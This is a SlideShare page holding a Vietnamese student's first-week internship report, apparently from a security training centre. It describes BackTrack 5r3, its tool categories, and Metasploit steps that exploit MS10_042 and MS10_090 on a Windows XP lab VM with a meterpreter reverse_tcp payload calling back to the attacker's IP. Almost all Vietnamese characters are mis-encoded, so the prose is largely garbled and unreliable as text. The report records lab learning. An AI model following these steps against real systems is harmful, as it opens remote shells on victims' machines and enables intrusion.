ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

Report athena week 1

?Download as DOCX, PDF?
?
Li¨ºn H¨¢n
Li¨ºn H¨¢n

B¨¢o c¨¢o v? tu?n th?c t?p ??u ti¨ºn t?i athena

1 of 3
Download to read offline
H? T¨ºn: ?? Li¨ºn H¨¢n Tr??ng: ??i H?c Qu?c T? B¨¢o C¨¢o Tu?n 1 C¨¢c V?n ?? C?a Tu?n Th? 1: 1.Nh?n t¨¤i li?u v¨¤ g?p gi¨¢o vi¨ºn h??ng d?n 2.C¨¤i ??t backtrack 5r3 3.Th?c h¨¤nh l¨¤m quen v?i backtrack qua 2 l?i MS10_090 v¨¤ MS10_042
I. Backtrack l¨¤ g¨¬? Backtrack l¨¤ m?t b?n ph?n ph?i d?ng Live DVD c?a Linux, ???c ph¨¢t tri?n ?? th? nghi?m th?m nh?p. Trong c¨¢c ??nh d?ng Live DVD, c¨® th? s? d?ng Backtrack tr?c ti?p t? DVD ho?c c¨¤i ??t tr¨ºn m¨¢y v¨¤ s? d?ng nh? m?t h? ?i?u h¨¤nh. Backtrack h? tr? m?t c¨¢ch nhanh ch¨®ng cho vi?c t¨¬m ki?m v¨¤ c?p nh?t c? s? d? li?u c¨¢c c?ng c? b?o m?t. Backtrack c¨® l?ch s? ph¨¢t tri?n qua nhi?u b?n Linux kh¨¢c nhau (phi¨ºn b?n hi?n nay s? d?ng b?n ph?n ph?i Slackware Linux) v¨¤ li¨ºn t?c c?p nh?p c¨¢c c?ng c?, drivers qua c¨¢c phi¨ºn b?n¡­ C?ng c? ki?m th? b?o m?t trong Backtrack c¨® th? ???c ph?n lo?i th¨¤nh c¨¢c nh¨®m nh? sau: Information gathering: S? d?ng ?? c¨® ???c th?ng tin li¨ºn quan ??n m?t m?c ti¨ºu DNS, ??a ch? email, trang web, m¨¢y ch? mail¡­. Network mapping: Qu¨¦t th?m d¨°, bao g?m vi?c ki?m tra c¨¢c host ?ang t?n t?i, th?ng tin v? h? ?i?u h¨¤nh, ?ng d?ng ???c s? d?ng b?i m?c ti¨ºu¡­. Vulnerability identification: Qu¨¦t c¨¢c l? h?ng, ph?n t¨ªch Server Message Block (SMB) v¨¤ Simple Network Management Protocol (SNMP). Web application analysis: Theo d?i, gi¨¢m s¨¢t c¨¢c ?ng d?ng web. Radio network analysis: Ki?m tra m?ng kh?ng d?y, bluetooth v¨¤ nh?n d?ng t?n s? v? tuy?n (RFID). Penetration: Khai th¨¢c c¨¢c l? h?ng t¨¬m th?y trong c¨¢c m¨¢y t¨ªnh m?c ti¨ºu. Privilege escalation: Sau khi khai th¨¢c c¨¢c l? h?ng v¨¤ ???c truy c?p v¨¤o c¨¢c m¨¢y t¨ªnh m?c ti¨ºu, c¨¢c c?ng c? trong lo?i n¨¤y c¨® th? s? d?ng ?? leo thang ??c quy?n. Maintaining access: Duy tr¨¬ quy?n truy c?p v¨¤o c¨¢c m¨¢y t¨ªnh m?c ti¨ºu. Nh?ng ??c quy?n cao nh?t l¨¤ ?i?u ki?n c?n thi?t tr??c khi c¨® th? c¨¤i ??t c?ng c? ?? duy tr¨¬ quy?n truy c?p. Voice Over IP (VOIP): C¨¢c c?ng c? ?? ph?n t¨ªch VOIP. Digital forensics: Ph?n t¨ªch h¨¬nh ?nh ??a c?ng, c?u tr¨²c c¨¢c t?p tinc¨® th? ch?n Start Backtrack Forensics trong tr¨¬nh ??n kh?i ??ng. Reverse engineering: G? r?i ch??ng tr¨¬nh ho?c th¨¢o r?i t?p tin th?c thi.
II. C¨¢c b??c th?c hi?n l?i MS10_042 v¨¤ MS10_090: a. L?i MS10_042: 1. Kh?i ??ng VMWare v?i 2 c?a s? backtrack v¨¤ windows XP. 2. ? c?a s? backtrack, kh?i ??ng c?a s? terminal v¨¤ g? l?nh msfconsole. 3. Sau ?¨® dung l?nh search ms10_042 ?? t¨¬m ki?m module. 4. K? ti?p d¨´ng l?nh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta d¨´ng l?nh show options ?? ki?m tra c¨¢c th?ng tin thu?c t¨ªnh c?n thi?t cho m? l?i. 6. Thi?t l?p c¨¢c th?ng tin c?n thi?t nh?: (1) Set srvhost [IP c?a m¨¢y backtrack] (2) Set lhost [IP c?a m¨¢y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D¨´ng l?nh exploit ?? tri?n khai. 8. Sau c¨´ng l¨¤ ch? m¨¢y n?n nh?n truy c?p v¨¤o ??a ch? ?? exploit. b. L?i MS10_090: 1. Kh?i ??ng VMWare v?i 2 c?a s? backtrack v¨¤ windows XP. 2. ? c?a s? backtrack, kh?i ??ng c?a s? terminal v¨¤ g? l?nh msfconsole. 3. Sau ?¨® dung l?nh search ms10_090 ?? t¨¬m ki?m module. 4. K? ti?p d¨´ng l?nh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta d¨´ng l?nh show options ?? ki?m tra c¨¢c th?ng tin thu?c t¨ªnh c?n thi?t cho m? l?i. 6. Thi?t l?p c¨¢c th?ng tin c?n thi?t nh?: (1) Set srvhost [IP c?a m¨¢y backtrack] (2) Set lhost [IP c?a m¨¢y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D¨´ng l?nh exploit ?? tri?n khai. 8. Sau c¨´ng l¨¤ ch? m¨¢y n?n nh?n truy c?p v¨¤o ???ng d?n ?? exploit. Demo cho 2 l?i tr¨ºn t?i link: MS10_042 ? t?i trang: http://youtu.be/Vk5697U2dMg MS10_090 ? t?i trang: http://youtu.be/t3rewc4tcCw

More Related Content

Report athena week 1

  • 1. H? T¨ºn: ?? Li¨ºn H¨¢n Tr??ng: ??i H?c Qu?c T? B¨¢o C¨¢o Tu?n 1 C¨¢c V?n ?? C?a Tu?n Th? 1: 1.Nh?n t¨¤i li?u v¨¤ g?p gi¨¢o vi¨ºn h??ng d?n 2.C¨¤i ??t backtrack 5r3 3.Th?c h¨¤nh l¨¤m quen v?i backtrack qua 2 l?i MS10_090 v¨¤ MS10_042
  • 2. I. Backtrack l¨¤ g¨¬? Backtrack l¨¤ m?t b?n ph?n ph?i d?ng Live DVD c?a Linux, ???c ph¨¢t tri?n ?? th? nghi?m th?m nh?p. Trong c¨¢c ??nh d?ng Live DVD, c¨® th? s? d?ng Backtrack tr?c ti?p t? DVD ho?c c¨¤i ??t tr¨ºn m¨¢y v¨¤ s? d?ng nh? m?t h? ?i?u h¨¤nh. Backtrack h? tr? m?t c¨¢ch nhanh ch¨®ng cho vi?c t¨¬m ki?m v¨¤ c?p nh?t c? s? d? li?u c¨¢c c?ng c? b?o m?t. Backtrack c¨® l?ch s? ph¨¢t tri?n qua nhi?u b?n Linux kh¨¢c nhau (phi¨ºn b?n hi?n nay s? d?ng b?n ph?n ph?i Slackware Linux) v¨¤ li¨ºn t?c c?p nh?p c¨¢c c?ng c?, drivers qua c¨¢c phi¨ºn b?n¡­ C?ng c? ki?m th? b?o m?t trong Backtrack c¨® th? ???c ph?n lo?i th¨¤nh c¨¢c nh¨®m nh? sau: Information gathering: S? d?ng ?? c¨® ???c th?ng tin li¨ºn quan ??n m?t m?c ti¨ºu DNS, ??a ch? email, trang web, m¨¢y ch? mail¡­. Network mapping: Qu¨¦t th?m d¨°, bao g?m vi?c ki?m tra c¨¢c host ?ang t?n t?i, th?ng tin v? h? ?i?u h¨¤nh, ?ng d?ng ???c s? d?ng b?i m?c ti¨ºu¡­. Vulnerability identification: Qu¨¦t c¨¢c l? h?ng, ph?n t¨ªch Server Message Block (SMB) v¨¤ Simple Network Management Protocol (SNMP). Web application analysis: Theo d?i, gi¨¢m s¨¢t c¨¢c ?ng d?ng web. Radio network analysis: Ki?m tra m?ng kh?ng d?y, bluetooth v¨¤ nh?n d?ng t?n s? v? tuy?n (RFID). Penetration: Khai th¨¢c c¨¢c l? h?ng t¨¬m th?y trong c¨¢c m¨¢y t¨ªnh m?c ti¨ºu. Privilege escalation: Sau khi khai th¨¢c c¨¢c l? h?ng v¨¤ ???c truy c?p v¨¤o c¨¢c m¨¢y t¨ªnh m?c ti¨ºu, c¨¢c c?ng c? trong lo?i n¨¤y c¨® th? s? d?ng ?? leo thang ??c quy?n. Maintaining access: Duy tr¨¬ quy?n truy c?p v¨¤o c¨¢c m¨¢y t¨ªnh m?c ti¨ºu. Nh?ng ??c quy?n cao nh?t l¨¤ ?i?u ki?n c?n thi?t tr??c khi c¨® th? c¨¤i ??t c?ng c? ?? duy tr¨¬ quy?n truy c?p. Voice Over IP (VOIP): C¨¢c c?ng c? ?? ph?n t¨ªch VOIP. Digital forensics: Ph?n t¨ªch h¨¬nh ?nh ??a c?ng, c?u tr¨²c c¨¢c t?p tinc¨® th? ch?n Start Backtrack Forensics trong tr¨¬nh ??n kh?i ??ng. Reverse engineering: G? r?i ch??ng tr¨¬nh ho?c th¨¢o r?i t?p tin th?c thi.
  • 3. II. C¨¢c b??c th?c hi?n l?i MS10_042 v¨¤ MS10_090: a. L?i MS10_042: 1. Kh?i ??ng VMWare v?i 2 c?a s? backtrack v¨¤ windows XP. 2. ? c?a s? backtrack, kh?i ??ng c?a s? terminal v¨¤ g? l?nh msfconsole. 3. Sau ?¨® dung l?nh search ms10_042 ?? t¨¬m ki?m module. 4. K? ti?p d¨´ng l?nh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta d¨´ng l?nh show options ?? ki?m tra c¨¢c th?ng tin thu?c t¨ªnh c?n thi?t cho m? l?i. 6. Thi?t l?p c¨¢c th?ng tin c?n thi?t nh?: (1) Set srvhost [IP c?a m¨¢y backtrack] (2) Set lhost [IP c?a m¨¢y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D¨´ng l?nh exploit ?? tri?n khai. 8. Sau c¨´ng l¨¤ ch? m¨¢y n?n nh?n truy c?p v¨¤o ??a ch? ?? exploit. b. L?i MS10_090: 1. Kh?i ??ng VMWare v?i 2 c?a s? backtrack v¨¤ windows XP. 2. ? c?a s? backtrack, kh?i ??ng c?a s? terminal v¨¤ g? l?nh msfconsole. 3. Sau ?¨® dung l?nh search ms10_090 ?? t¨¬m ki?m module. 4. K? ti?p d¨´ng l?nh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta d¨´ng l?nh show options ?? ki?m tra c¨¢c th?ng tin thu?c t¨ªnh c?n thi?t cho m? l?i. 6. Thi?t l?p c¨¢c th?ng tin c?n thi?t nh?: (1) Set srvhost [IP c?a m¨¢y backtrack] (2) Set lhost [IP c?a m¨¢y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D¨´ng l?nh exploit ?? tri?n khai. 8. Sau c¨´ng l¨¤ ch? m¨¢y n?n nh?n truy c?p v¨¤o ???ng d?n ?? exploit. Demo cho 2 l?i tr¨ºn t?i link: MS10_042 ? t?i trang: http://youtu.be/Vk5697U2dMg MS10_090 ? t?i trang: http://youtu.be/t3rewc4tcCw